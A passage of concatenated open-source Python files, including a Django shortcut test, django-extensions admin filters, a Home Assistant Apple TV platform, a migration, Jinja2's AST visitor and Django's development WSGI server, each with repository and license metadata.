# Using an EmptyQuerySet raises a Http404 error.
self.assertRaises(Http404,
get_object_or_404, Article.objects.none(), title__contains="Run"
)
# get_list_or_404 can be used to get lists of objects
self.assertEqual(
get_list_or_404(a1.article_set, title__icontains="Run"),
[article]
)
# Http404 is returned if the list is empty.
self.assertRaises(Http404,
get_list_or_404, a1.article_set, title__icontains="Shrubbery"
)
# Custom managers can be used too.
self.assertEqual(
get_list_or_404(Article.by_a_sir, title__icontains="Run"),
[article]
)
# QuerySets can be used too.
self.assertEqual(
get_list_or_404(Article.objects.all(), title__icontains="Run"),
[article]
)
| gpl-3.0 |
VishvajitP/django-extensions | django_extensions/admin/filter.py | 16 | 1997 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib.admin import FieldListFilter
try:
from django.contrib.admin.utils import prepare_lookup_value
except ImportError:
# django < 1.7
from django.contrib.admin.util import prepare_lookup_value
from django.utils.translation import ugettext_lazy as _
class NullFieldListFilter(FieldListFilter):
def __init__(self, field, request, params, model, model_admin, field_path):
self.lookup_kwarg = '{0}__isnull'.format(field_path)
super(NullFieldListFilter, self).__init__(field, request, params, model, model_admin, field_path)
lookup_choices = self.lookups(request, model_admin)
self.lookup_choices = () if lookup_choices is None else list(lookup_choices)
def expected_parameters(self):
return [self.lookup_kwarg]
def value(self):
return self.used_parameters.get(self.lookup_kwarg, None)
def lookups(self, request, model_admin):
return (
('1', _('Yes')),
('0', _('No')),
)
def choices(self, cl):
yield {
'selected': self.value() is None,
'query_string': cl.get_query_string({}, [self.lookup_kwarg]),
'display': _('All'),
}
for lookup, title in self.lookup_choices:
yield {
'selected': self.value() == prepare_lookup_value(self.lookup_kwarg, lookup),
'query_string': cl.get_query_string({
self.lookup_kwarg: lookup,
}, []),
'display': title,
}
def queryset(self, request, queryset):
if self.value() is not None:
kwargs = {self.lookup_kwarg: self.value()}
return queryset.filter(**kwargs)
return queryset
class NotNullFieldListFilter(NullFieldListFilter):
def lookups(self, request, model_admin):
return (
('0', _('Yes')),
('1', _('No')),
)
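# --- Usage sketch (not part of the original module) ---
# How these filters are typically wired into the admin; ``Book`` and its
# nullable ``published_at`` field are hypothetical placeholders, so the
# snippet is left commented rather than executed at import time:
#
#     from django.contrib import admin
#     from django_extensions.admin.filter import (
#         NullFieldListFilter, NotNullFieldListFilter)
#
#     class BookAdmin(admin.ModelAdmin):
#         list_filter = (
#             ('published_at', NullFieldListFilter),
#         )
#     admin.site.register(Book, BookAdmin)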
| mit |
Zac-HD/home-assistant | homeassistant/components/media_player/apple_tv.py | 3 | 9307 | """
Support for Apple TV.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/media_player.apple_tv/
"""
import asyncio
import logging
import hashlib
import aiohttp
import voluptuous as vol
from homeassistant.core import callback
from homeassistant.components.media_player import (
SUPPORT_NEXT_TRACK, SUPPORT_PAUSE, SUPPORT_PREVIOUS_TRACK, SUPPORT_SEEK,
SUPPORT_STOP, SUPPORT_PLAY, SUPPORT_PLAY_MEDIA, SUPPORT_TURN_ON,
SUPPORT_TURN_OFF, MediaPlayerDevice, PLATFORM_SCHEMA, MEDIA_TYPE_MUSIC,
MEDIA_TYPE_VIDEO, MEDIA_TYPE_TVSHOW)
from homeassistant.const import (
STATE_IDLE, STATE_PAUSED, STATE_PLAYING, STATE_STANDBY, CONF_HOST,
STATE_OFF, CONF_NAME)
from homeassistant.helpers.aiohttp_client import async_get_clientsession
import homeassistant.helpers.config_validation as cv
import homeassistant.util.dt as dt_util
REQUIREMENTS = ['pyatv==0.1.4']
_LOGGER = logging.getLogger(__name__)
CONF_LOGIN_ID = 'login_id'
CONF_START_OFF = 'start_off'
DEFAULT_NAME = 'Apple TV'
DATA_APPLE_TV = 'apple_tv'
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_LOGIN_ID): cv.string,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_START_OFF, default=False): cv.boolean
})
@asyncio.coroutine
def async_setup_platform(hass, config, async_add_entities,
discovery_info=None):
"""Setup the Apple TV platform."""
import pyatv
if discovery_info is not None:
name = discovery_info['name']
host = discovery_info['host']
login_id = discovery_info['hsgid']
start_off = False
else:
name = config.get(CONF_NAME)
host = config.get(CONF_HOST)
login_id = config.get(CONF_LOGIN_ID)
start_off = config.get(CONF_START_OFF)
if DATA_APPLE_TV not in hass.data:
hass.data[DATA_APPLE_TV] = []
if host in hass.data[DATA_APPLE_TV]:
return False
hass.data[DATA_APPLE_TV].append(host)
details = pyatv.AppleTVDevice(name, host, login_id)
session = async_get_clientsession(hass)
atv = pyatv.connect_to_apple_tv(details, hass.loop, session=session)
entity = AppleTvDevice(atv, name, start_off)
yield from async_add_entities([entity], update_before_add=True)
class AppleTvDevice(MediaPlayerDevice):
"""Representation of an Apple TV device."""
def __init__(self, atv, name, is_off):
"""Initialize the Apple TV device."""
self._atv = atv
self._name = name
self._is_off = is_off
self._playing = None
self._artwork_hash = None
@callback
def _set_power_off(self, is_off):
self._playing = None
self._artwork_hash = None
self._is_off = is_off
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def state(self):
"""Return the state of the device."""
if self._is_off:
return STATE_OFF
if self._playing is not None:
from pyatv import const
state = self._playing.play_state
if state == const.PLAY_STATE_NO_MEDIA:
return STATE_IDLE
elif state == const.PLAY_STATE_PLAYING or \
state == const.PLAY_STATE_LOADING:
return STATE_PLAYING
elif state == const.PLAY_STATE_PAUSED or \
state == const.PLAY_STATE_FAST_FORWARD or \
state == const.PLAY_STATE_FAST_BACKWARD:
# Catch fast forward/backward here so "play" is default action
return STATE_PAUSED
else:
return STATE_STANDBY # Bad or unknown state?
@asyncio.coroutine
def async_update(self):
"""Retrieve latest state."""
if self._is_off:
return
from pyatv import exceptions
try:
playing = yield from self._atv.metadata.playing()
if self._has_playing_media_changed(playing):
base = str(playing.title) + str(playing.artist) + \
str(playing.album) + str(playing.total_time)
self._artwork_hash = hashlib.md5(
base.encode('utf-8')).hexdigest()
self._playing = playing
except exceptions.AuthenticationError as ex:
_LOGGER.warning('%s (bad login id?)', str(ex))
except aiohttp.errors.ClientOSError as ex:
_LOGGER.error('failed to connect to Apple TV (%s)', str(ex))
except asyncio.TimeoutError:
_LOGGER.warning('timed out while connecting to Apple TV')
def _has_playing_media_changed(self, new_playing):
if self._playing is None:
return True
old_playing = self._playing
return new_playing.media_type != old_playing.media_type or \
new_playing.title != old_playing.title
@property
def media_content_type(self):
"""Content type of current playing media."""
if self._playing is not None:
from pyatv import const
media_type = self._playing.media_type
if media_type == const.MEDIA_TYPE_VIDEO:
return MEDIA_TYPE_VIDEO
elif media_type == const.MEDIA_TYPE_MUSIC:
return MEDIA_TYPE_MUSIC
elif media_type == const.MEDIA_TYPE_TV:
return MEDIA_TYPE_TVSHOW
@property
def media_duration(self):
"""Duration of current playing media in seconds."""
if self._playing is not None:
return self._playing.total_time
@property
def media_position(self):
"""Position of current playing media in seconds."""
if self._playing is not None:
return self._playing.position
@property
def media_position_updated_at(self):
"""Last valid time of media position."""
state = self.state
if state == STATE_PLAYING or state == STATE_PAUSED:
return dt_util.utcnow()
@asyncio.coroutine
def async_play_media(self, media_type, media_id, **kwargs):
"""Send the play_media command to the media player."""
yield from self._atv.remote_control.play_url(media_id, 0)
@property
def media_image_hash(self):
"""Hash value for media image."""
return self._artwork_hash
@asyncio.coroutine
def async_get_media_image(self):
"""Fetch media image of current playing image."""
return (yield from self._atv.metadata.artwork()), 'image/png'
@property
def media_title(self):
"""Title of current playing media."""
if self._playing is not None:
if self.state == STATE_IDLE:
return 'Nothing playing'
title = self._playing.title
return title if title else "No title"
@property
def supported_features(self):
"""Flag media player features that are supported."""
features = SUPPORT_TURN_ON | SUPPORT_TURN_OFF | SUPPORT_PLAY_MEDIA
if self._playing is None or self.state == STATE_IDLE:
return features
features |= SUPPORT_PAUSE | SUPPORT_PLAY | SUPPORT_SEEK | \
SUPPORT_STOP | SUPPORT_NEXT_TRACK | SUPPORT_PREVIOUS_TRACK
return features
@asyncio.coroutine
def async_turn_on(self):
"""Turn the media player on."""
self._set_power_off(False)
@asyncio.coroutine
def async_turn_off(self):
"""Turn the media player off."""
self._set_power_off(True)
def async_media_play_pause(self):
"""Pause media on media player.
This method must be run in the event loop and returns a coroutine.
"""
if self._playing is not None:
state = self.state
if state == STATE_PAUSED:
return self._atv.remote_control.play()
elif state == STATE_PLAYING:
return self._atv.remote_control.pause()
def async_media_play(self):
"""Play media.
This method must be run in the event loop and returns a coroutine.
"""
if self._playing is not None:
return self._atv.remote_control.play()
def async_media_pause(self):
"""Pause the media player.
This method must be run in the event loop and returns a coroutine.
"""
if self._playing is not None:
return self._atv.remote_control.pause()
def async_media_next_track(self):
"""Send next track command.
This method must be run in the event loop and returns a coroutine.
"""
if self._playing is not None:
return self._atv.remote_control.next()
def async_media_previous_track(self):
"""Send previous track command.
This method must be run in the event loop and returns a coroutine.
"""
if self._playing is not None:
return self._atv.remote_control.previous()
def async_media_seek(self, position):
"""Send seek command.
This method must be run in the event loop and returns a coroutine.
"""
if self._playing is not None:
return self._atv.remote_control.set_position(position)
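# --- Configuration sketch (not part of the original module) ---
# Example configuration.yaml entry for this platform, inferred from
# PLATFORM_SCHEMA above; host and login_id are placeholders that must
# match a real device:
#
#   media_player:
#     - platform: apple_tv
#       host: 192.168.1.20
#       login_id: 00000000-1111-2222-3333-444444444444
#       name: Living Room
#       start_off: false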
| apache-2.0 |
thrive-refugee/thrive-refugee | donors/migrations/0005_auto_20141108_1219.py | 1 | 1067 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
class Migration(migrations.Migration):
dependencies = [
('donors', '0004_auto_20141108_1110'),
]
operations = [
migrations.CreateModel(
name='Donation',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('when', models.DateField(default=datetime.date.today)),
('amount', models.DecimalField(max_digits=11, decimal_places=2)),
('memo', models.CharField(max_length=256, blank=True)),
('donor', models.ForeignKey(to='donors.Donor')),
],
options={
},
bases=(models.Model,),
),
migrations.RemoveField(
model_name='donor',
name='last_amount',
),
migrations.RemoveField(
model_name='donor',
name='last_donation',
),
]
| mit |
davidvon/pipa-pay-server | site-packages/jinja2/visitor.py | 1401 | 3316 | # -*- coding: utf-8 -*-
"""
jinja2.visitor
~~~~~~~~~~~~~~
This module implements a visitor for the nodes.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD.
"""
from jinja2.nodes import Node
class NodeVisitor(object):
"""Walks the abstract syntax tree and call visitor functions for every
node found. The visitor functions may return values which will be
forwarded by the `visit` method.
Per default the visitor functions for the nodes are ``'visit_'`` +
class name of the node. So a `TryFinally` node visit function would
be `visit_TryFinally`. This behavior can be changed by overriding
the `get_visitor` function. If no visitor function exists for a node
(return value `None`) the `generic_visit` visitor is used instead.
"""
def get_visitor(self, node):
"""Return the visitor function for this node or `None` if no visitor
exists for this node. In that case the generic visit function is
used instead.
"""
method = 'visit_' + node.__class__.__name__
return getattr(self, method, None)
def visit(self, node, *args, **kwargs):
"""Visit a node."""
f = self.get_visitor(node)
if f is not None:
return f(node, *args, **kwargs)
return self.generic_visit(node, *args, **kwargs)
def generic_visit(self, node, *args, **kwargs):
"""Called if no explicit visitor function exists for a node."""
for node in node.iter_child_nodes():
self.visit(node, *args, **kwargs)
class NodeTransformer(NodeVisitor):
"""Walks the abstract syntax tree and allows modifications of nodes.
The `NodeTransformer` will walk the AST and use the return value of the
visitor functions to replace or remove the old node. If the return
value of the visitor function is `None` the node will be removed
from the previous location otherwise it's replaced with the return
value. The return value may be the original node in which case no
replacement takes place.
"""
def generic_visit(self, node, *args, **kwargs):
for field, old_value in node.iter_fields():
if isinstance(old_value, list):
new_values = []
for value in old_value:
if isinstance(value, Node):
value = self.visit(value, *args, **kwargs)
if value is None:
continue
elif not isinstance(value, Node):
new_values.extend(value)
continue
new_values.append(value)
old_value[:] = new_values
elif isinstance(old_value, Node):
new_node = self.visit(old_value, *args, **kwargs)
if new_node is None:
delattr(node, field)
else:
setattr(node, field, new_node)
return node
def visit_list(self, node, *args, **kwargs):
"""As transformers may return lists in some places this method
can be used to enforce a list as return value.
"""
rv = self.visit(node, *args, **kwargs)
if not isinstance(rv, list):
rv = [rv]
return rv
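# --- Usage sketch (not part of the original module) ---
# A minimal demonstration of the visitor machinery above, assuming only a
# stock Jinja2 Environment: walk a parsed template and collect every Name
# node encountered.
if __name__ == '__main__':
    from jinja2 import Environment
    class NameCollector(NodeVisitor):
        """Collect the names of all Name nodes in an AST."""
        def __init__(self):
            self.names = []
        def visit_Name(self, node, *args, **kwargs):
            self.names.append(node.name)
            self.generic_visit(node, *args, **kwargs)
    ast = Environment().parse('{{ user.name }} has {{ count }} items')
    collector = NameCollector()
    collector.visit(ast)
    print(collector.names)  # -> ['user', 'count']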
| apache-2.0 |
isaac-philip/loolu | common/django/core/servers/basehttp.py | 9 | 25759 | """
BaseHTTPServer that implements the Python WSGI protocol (PEP 333, rev 1.21).
Adapted from wsgiref.simple_server: http://svn.eby-sarna.com/wsgiref/
This is a simple server for use in testing or debugging Django apps. It hasn't
been reviewed for security issues. Don't use it in production.
"""
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import mimetypes
import os
import re
import stat
import sys
import urllib
from django.utils.http import http_date
from django.utils._os import safe_join
__version__ = "0.1"
__all__ = ['WSGIServer','WSGIRequestHandler']
server_version = "WSGIServer/" + __version__
sys_version = "Python/" + sys.version.split()[0]
software_version = server_version + ' ' + sys_version
class WSGIServerException(Exception):
pass
class FileWrapper(object):
"""Wrapper to convert file-like objects to iterables"""
def __init__(self, filelike, blksize=8192):
self.filelike = filelike
self.blksize = blksize
if hasattr(filelike,'close'):
self.close = filelike.close
def __getitem__(self,key):
data = self.filelike.read(self.blksize)
if data:
return data
raise IndexError
def __iter__(self):
return self
def next(self):
data = self.filelike.read(self.blksize)
if data:
return data
raise StopIteration
# Regular expression that matches `special' characters in parameters, the
# existence of which force quoting of the parameter value.
tspecials = re.compile(r'[ \(\)<>@,;:\\"/\[\]\?=]')
def _formatparam(param, value=None, quote=1):
"""Convenience function to format and return a key=value pair.
This will quote the value if needed or if quote is true.
"""
if value is not None and len(value) > 0:
if quote or tspecials.search(value):
value = value.replace('\\', '\\\\').replace('"', r'\"')
return '%s="%s"' % (param, value)
else:
return '%s=%s' % (param, value)
else:
return param
class Headers(object):
"""Manage a collection of HTTP response headers"""
def __init__(self,headers):
if not isinstance(headers, list):
raise TypeError("Headers must be a list of name/value tuples")
self._headers = headers
def __len__(self):
"""Return the total number of headers, including duplicates."""
return len(self._headers)
def __setitem__(self, name, val):
"""Set the value of a header."""
del self[name]
self._headers.append((name, val))
def __delitem__(self,name):
"""Delete all occurrences of a header, if present.
Does *not* raise an exception if the header is missing.
"""
name = name.lower()
self._headers[:] = [kv for kv in self._headers if kv[0].lower()<>name]
def __getitem__(self,name):
"""Get the first header value for 'name'
Return None if the header is missing instead of raising an exception.
        Note that if the header appeared multiple times, exactly which
        occurrence gets returned is undefined. Use get_all() to get all
the values matching a header field name.
"""
return self.get(name)
def has_key(self, name):
"""Return true if the message contains the header."""
return self.get(name) is not None
__contains__ = has_key
def get_all(self, name):
"""Return a list of all the values for the named field.
These will be sorted in the order they appeared in the original header
list or were added to this instance, and may contain duplicates. Any
fields deleted and re-inserted are always appended to the header list.
If no fields exist with the given name, returns an empty list.
"""
name = name.lower()
return [kv[1] for kv in self._headers if kv[0].lower()==name]
def get(self,name,default=None):
"""Get the first header value for 'name', or return 'default'"""
name = name.lower()
for k,v in self._headers:
if k.lower()==name:
return v
return default
def keys(self):
"""Return a list of all the header field names.
These will be sorted in the order they appeared in the original header
list, or were added to this instance, and may contain duplicates.
Any fields deleted and re-inserted are always appended to the header
list.
"""
return [k for k, v in self._headers]
def values(self):
"""Return a list of all header values.
These will be sorted in the order they appeared in the original header
list, or were added to this instance, and may contain duplicates.
Any fields deleted and re-inserted are always appended to the header
list.
"""
return [v for k, v in self._headers]
def items(self):
"""Get all the header fields and values.
These will be sorted in the order they were in the original header
list, or were added to this instance, and may contain duplicates.
Any fields deleted and re-inserted are always appended to the header
list.
"""
return self._headers[:]
def __repr__(self):
return "Headers(%s)" % `self._headers`
def __str__(self):
"""str() returns the formatted headers, complete with end line,
suitable for direct HTTP transmission."""
return '\r\n'.join(["%s: %s" % kv for kv in self._headers]+['',''])
def setdefault(self,name,value):
"""Return first matching header value for 'name', or 'value'
If there is no header named 'name', add a new header with name 'name'
and value 'value'."""
result = self.get(name)
if result is None:
self._headers.append((name,value))
return value
else:
return result
def add_header(self, _name, _value, **_params):
"""Extended header setting.
_name is the header field to add. keyword arguments can be used to set
additional parameters for the header field, with underscores converted
to dashes. Normally the parameter will be added as key="value" unless
value is None, in which case only the key will be added.
Example:
h.add_header('content-disposition', 'attachment', filename='bud.gif')
Note that unlike the corresponding 'email.Message' method, this does
*not* handle '(charset, language, value)' tuples: all values must be
strings or None.
"""
parts = []
if _value is not None:
parts.append(_value)
for k, v in _params.items():
if v is None:
parts.append(k.replace('_', '-'))
else:
parts.append(_formatparam(k.replace('_', '-'), v))
self._headers.append((_name, "; ".join(parts)))
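# --- Usage sketch (not part of the original module) ---
# Headers behaves like a case-insensitive multi-dict over a list of
# name/value tuples:
#
#     h = Headers([('Content-Type', 'text/plain')])
#     h['X-Frame-Options'] = 'DENY'
#     h.add_header('Content-Disposition', 'attachment', filename='log.txt')
#     str(h)   # the formatted header block, ready for transmission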
def guess_scheme(environ):
"""Return a guess for whether 'wsgi.url_scheme' should be 'http' or 'https'
"""
if environ.get("HTTPS") in ('yes','on','1'):
return 'https'
else:
return 'http'
_hop_headers = {
'connection':1, 'keep-alive':1, 'proxy-authenticate':1,
'proxy-authorization':1, 'te':1, 'trailers':1, 'transfer-encoding':1,
'upgrade':1
}
def is_hop_by_hop(header_name):
"""Return true if 'header_name' is an HTTP/1.1 "Hop-by-Hop" header"""
return header_name.lower() in _hop_headers
class ServerHandler(object):
"""Manage the invocation of a WSGI application"""
# Configuration parameters; can override per-subclass or per-instance
wsgi_version = (1,0)
wsgi_multithread = True
wsgi_multiprocess = True
wsgi_run_once = False
origin_server = True # We are transmitting direct to client
http_version = "1.0" # Version that should be used for response
server_software = software_version
# os_environ is used to supply configuration from the OS environment:
# by default it's a copy of 'os.environ' as of import time, but you can
# override this in e.g. your __init__ method.
os_environ = dict(os.environ.items())
# Collaborator classes
wsgi_file_wrapper = FileWrapper # set to None to disable
headers_class = Headers # must be a Headers-like class
# Error handling (also per-subclass or per-instance)
traceback_limit = None # Print entire traceback to self.get_stderr()
error_status = "500 INTERNAL SERVER ERROR"
error_headers = [('Content-Type','text/plain')]
# State variables (don't mess with these)
status = result = None
headers_sent = False
headers = None
bytes_sent = 0
def __init__(self, stdin, stdout, stderr, environ, multithread=True,
multiprocess=False):
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
self.base_env = environ
self.wsgi_multithread = multithread
self.wsgi_multiprocess = multiprocess
def run(self, application):
"""Invoke the application"""
# Note to self: don't move the close()! Asynchronous servers shouldn't
# call close() from finish_response(), so if you close() anywhere but
# the double-error branch here, you'll break asynchronous servers by
# prematurely closing. Async servers must return from 'run()' without
# closing if there might still be output to iterate over.
try:
self.setup_environ()
self.result = application(self.environ, self.start_response)
self.finish_response()
except:
try:
self.handle_error()
except:
# If we get an error handling an error, just give up already!
self.close()
raise # ...and let the actual server figure it out.
def setup_environ(self):
"""Set up the environment for one request"""
env = self.environ = self.os_environ.copy()
self.add_cgi_vars()
env['wsgi.input'] = self.get_stdin()
env['wsgi.errors'] = self.get_stderr()
env['wsgi.version'] = self.wsgi_version
env['wsgi.run_once'] = self.wsgi_run_once
env['wsgi.url_scheme'] = self.get_scheme()
env['wsgi.multithread'] = self.wsgi_multithread
env['wsgi.multiprocess'] = self.wsgi_multiprocess
if self.wsgi_file_wrapper is not None:
env['wsgi.file_wrapper'] = self.wsgi_file_wrapper
if self.origin_server and self.server_software:
env.setdefault('SERVER_SOFTWARE',self.server_software)
def finish_response(self):
"""
Send any iterable data, then close self and the iterable
Subclasses intended for use in asynchronous servers will want to
redefine this method, such that it sets up callbacks in the event loop
to iterate over the data, and to call 'self.close()' once the response
is finished.
"""
if not self.result_is_file() or not self.sendfile():
for data in self.result:
self.write(data)
self.finish_content()
self.close()
def get_scheme(self):
"""Return the URL scheme being used"""
return guess_scheme(self.environ)
def set_content_length(self):
"""Compute Content-Length or switch to chunked encoding if possible"""
try:
blocks = len(self.result)
except (TypeError, AttributeError, NotImplementedError):
pass
else:
if blocks==1:
self.headers['Content-Length'] = str(self.bytes_sent)
return
# XXX Try for chunked encoding if origin server and client is 1.1
def cleanup_headers(self):
"""Make any necessary header changes or defaults
Subclasses can extend this to add other defaults.
"""
if 'Content-Length' not in self.headers:
self.set_content_length()
def start_response(self, status, headers,exc_info=None):
"""'start_response()' callable as specified by PEP 333"""
if exc_info:
try:
if self.headers_sent:
# Re-raise original exception if headers sent
raise exc_info[0], exc_info[1], exc_info[2]
finally:
exc_info = None # avoid dangling circular ref
elif self.headers is not None:
raise AssertionError("Headers already set!")
assert isinstance(status, str),"Status must be a string"
assert len(status)>=4,"Status must be at least 4 characters"
assert int(status[:3]),"Status message must begin w/3-digit code"
assert status[3]==" ", "Status message must have a space after code"
if __debug__:
for name,val in headers:
assert isinstance(name, str),"Header names must be strings"
assert isinstance(val, str),"Header values must be strings"
assert not is_hop_by_hop(name),"Hop-by-hop headers not allowed"
self.status = status
self.headers = self.headers_class(headers)
return self.write
def send_preamble(self):
"""Transmit version/status/date/server, via self._write()"""
if self.origin_server:
if self.client_is_modern():
self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
if 'Date' not in self.headers:
self._write(
'Date: %s\r\n' % http_date()
)
if self.server_software and 'Server' not in self.headers:
self._write('Server: %s\r\n' % self.server_software)
else:
self._write('Status: %s\r\n' % self.status)
def write(self, data):
"""'write()' callable as specified by PEP 333"""
assert isinstance(data, str), "write() argument must be string"
if not self.status:
raise AssertionError("write() before start_response()")
elif not self.headers_sent:
# Before the first output, send the stored headers
self.bytes_sent = len(data) # make sure we know content-length
self.send_headers()
else:
self.bytes_sent += len(data)
# XXX check Content-Length and truncate if too many bytes written?
# If data is too large, socket will choke, so write chunks no larger
# than 32MB at a time.
length = len(data)
if length > 33554432:
offset = 0
while offset < length:
chunk_size = min(33554432, length)
self._write(data[offset:offset+chunk_size])
self._flush()
offset += chunk_size
else:
self._write(data)
self._flush()
def sendfile(self):
"""Platform-specific file transmission
Override this method in subclasses to support platform-specific
file transmission. It is only called if the application's
return iterable ('self.result') is an instance of
'self.wsgi_file_wrapper'.
This method should return a true value if it was able to actually
transmit the wrapped file-like object using a platform-specific
approach. It should return a false value if normal iteration
should be used instead. An exception can be raised to indicate
that transmission was attempted, but failed.
NOTE: this method should call 'self.send_headers()' if
'self.headers_sent' is false and it is going to attempt direct
        transmission of the file.
"""
return False # No platform-specific transmission by default
def finish_content(self):
"""Ensure headers and content have both been sent"""
if not self.headers_sent:
self.headers['Content-Length'] = "0"
self.send_headers()
else:
pass # XXX check if content-length was too short?
def close(self):
try:
self.request_handler.log_request(self.status.split(' ',1)[0], self.bytes_sent)
finally:
try:
if hasattr(self.result,'close'):
self.result.close()
finally:
self.result = self.headers = self.status = self.environ = None
self.bytes_sent = 0; self.headers_sent = False
def send_headers(self):
"""Transmit headers to the client, via self._write()"""
self.cleanup_headers()
self.headers_sent = True
if not self.origin_server or self.client_is_modern():
self.send_preamble()
self._write(str(self.headers))
def result_is_file(self):
"""True if 'self.result' is an instance of 'self.wsgi_file_wrapper'"""
wrapper = self.wsgi_file_wrapper
return wrapper is not None and isinstance(self.result,wrapper)
def client_is_modern(self):
"""True if client can accept status and headers"""
return self.environ['SERVER_PROTOCOL'].upper() != 'HTTP/0.9'
def log_exception(self,exc_info):
"""Log the 'exc_info' tuple in the server log
Subclasses may override to retarget the output or change its format.
"""
try:
from traceback import print_exception
stderr = self.get_stderr()
print_exception(
exc_info[0], exc_info[1], exc_info[2],
self.traceback_limit, stderr
)
stderr.flush()
finally:
exc_info = None
def handle_error(self):
"""Log current error, and send error output to client if possible"""
self.log_exception(sys.exc_info())
if not self.headers_sent:
self.result = self.error_output(self.environ, self.start_response)
self.finish_response()
# XXX else: attempt advanced recovery techniques for HTML or text?
def error_output(self, environ, start_response):
import traceback
start_response(self.error_status, self.error_headers[:], sys.exc_info())
return ['\n'.join(traceback.format_exception(*sys.exc_info()))]
# Pure abstract methods; *must* be overridden in subclasses
def _write(self,data):
self.stdout.write(data)
self._write = self.stdout.write
def _flush(self):
self.stdout.flush()
self._flush = self.stdout.flush
def get_stdin(self):
return self.stdin
def get_stderr(self):
return self.stderr
def add_cgi_vars(self):
self.environ.update(self.base_env)
class WSGIServer(HTTPServer):
"""BaseHTTPServer that implements the Python WSGI protocol"""
application = None
def server_bind(self):
"""Override server_bind to store the server name."""
try:
HTTPServer.server_bind(self)
except Exception, e:
raise WSGIServerException, e
self.setup_environ()
def setup_environ(self):
# Set up base environment
env = self.base_environ = {}
env['SERVER_NAME'] = self.server_name
env['GATEWAY_INTERFACE'] = 'CGI/1.1'
env['SERVER_PORT'] = str(self.server_port)
env['REMOTE_HOST']=''
env['CONTENT_LENGTH']=''
env['SCRIPT_NAME'] = ''
def get_app(self):
return self.application
def set_app(self,application):
self.application = application
class WSGIRequestHandler(BaseHTTPRequestHandler):
server_version = "WSGIServer/" + __version__
def __init__(self, *args, **kwargs):
from django.conf import settings
self.admin_media_prefix = settings.ADMIN_MEDIA_PREFIX
# We set self.path to avoid crashes in log_message() on unsupported
# requests (like "OPTIONS").
self.path = ''
BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
def get_environ(self):
env = self.server.base_environ.copy()
env['SERVER_PROTOCOL'] = self.request_version
env['REQUEST_METHOD'] = self.command
if '?' in self.path:
path,query = self.path.split('?',1)
else:
path,query = self.path,''
env['PATH_INFO'] = urllib.unquote(path)
env['QUERY_STRING'] = query
env['REMOTE_ADDR'] = self.client_address[0]
if self.headers.typeheader is None:
env['CONTENT_TYPE'] = self.headers.type
else:
env['CONTENT_TYPE'] = self.headers.typeheader
length = self.headers.getheader('content-length')
if length:
env['CONTENT_LENGTH'] = length
for h in self.headers.headers:
k,v = h.split(':',1)
k=k.replace('-','_').upper(); v=v.strip()
if k in env:
                continue  # skip content length, type, etc.
if 'HTTP_'+k in env:
env['HTTP_'+k] += ','+v # comma-separate multiple headers
else:
env['HTTP_'+k] = v
return env
def get_stderr(self):
return sys.stderr
def handle(self):
"""Handle a single HTTP request"""
self.raw_requestline = self.rfile.readline()
if not self.parse_request(): # An error code has been sent, just exit
return
handler = ServerHandler(self.rfile, self.wfile, self.get_stderr(), self.get_environ())
handler.request_handler = self # backpointer for logging
handler.run(self.server.get_app())
def log_message(self, format, *args):
# Don't bother logging requests for admin images or the favicon.
if self.path.startswith(self.admin_media_prefix) or self.path == '/favicon.ico':
return
sys.stderr.write("[%s] %s\n" % (self.log_date_time_string(), format % args))
class AdminMediaHandler(object):
"""
WSGI middleware that intercepts calls to the admin media directory, as
defined by the ADMIN_MEDIA_PREFIX setting, and serves those images.
Use this ONLY LOCALLY, for development! This hasn't been tested for
security and is not super efficient.
"""
def __init__(self, application, media_dir=None):
from django.conf import settings
self.application = application
if not media_dir:
import django
self.media_dir = \
os.path.join(django.__path__[0], 'contrib', 'admin', 'media')
else:
self.media_dir = media_dir
self.media_url = settings.ADMIN_MEDIA_PREFIX
def file_path(self, url):
"""
Returns the path to the media file on disk for the given URL.
The passed URL is assumed to begin with ADMIN_MEDIA_PREFIX. If the
resultant file path is outside the media directory, then a ValueError
is raised.
"""
# Remove ADMIN_MEDIA_PREFIX.
relative_url = url[len(self.media_url):]
relative_path = urllib.url2pathname(relative_url)
return safe_join(self.media_dir, relative_path)
def __call__(self, environ, start_response):
import os.path
# Ignore requests that aren't under ADMIN_MEDIA_PREFIX. Also ignore
# all requests if ADMIN_MEDIA_PREFIX isn't a relative URL.
if self.media_url.startswith('http://') or self.media_url.startswith('https://') \
or not environ['PATH_INFO'].startswith(self.media_url):
return self.application(environ, start_response)
# Find the admin file and serve it up, if it exists and is readable.
try:
file_path = self.file_path(environ['PATH_INFO'])
except ValueError: # Resulting file path was not valid.
status = '404 NOT FOUND'
headers = {'Content-type': 'text/plain'}
output = ['Page not found: %s' % environ['PATH_INFO']]
start_response(status, headers.items())
return output
if not os.path.exists(file_path):
status = '404 NOT FOUND'
headers = {'Content-type': 'text/plain'}
output = ['Page not found: %s' % environ['PATH_INFO']]
else:
try:
fp = open(file_path, 'rb')
except IOError:
status = '401 UNAUTHORIZED'
headers = {'Content-type': 'text/plain'}
output = ['Permission denied: %s' % environ['PATH_INFO']]
else:
# This is a very simple implementation of conditional GET with
# the Last-Modified header. It makes media files a bit speedier
# because the files are only read off disk for the first
# request (assuming the browser/client supports conditional
# GET).
mtime = http_date(os.stat(file_path)[stat.ST_MTIME])
headers = {'Last-Modified': mtime}
if environ.get('HTTP_IF_MODIFIED_SINCE', None) == mtime:
status = '304 NOT MODIFIED'
output = []
else:
status = '200 OK'
mime_type = mimetypes.guess_type(file_path)[0]
if mime_type:
headers['Content-Type'] = mime_type
output = [fp.read()]
fp.close()
start_response(status, headers.items())
return output
def run(addr, port, wsgi_handler):
server_address = (addr, port)
httpd = WSGIServer(server_address, WSGIRequestHandler)
httpd.set_app(wsgi_handler)
httpd.serve_forever()
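# --- Usage sketch (not part of the original module) ---
# A minimal WSGI application served through run() above, handy for poking
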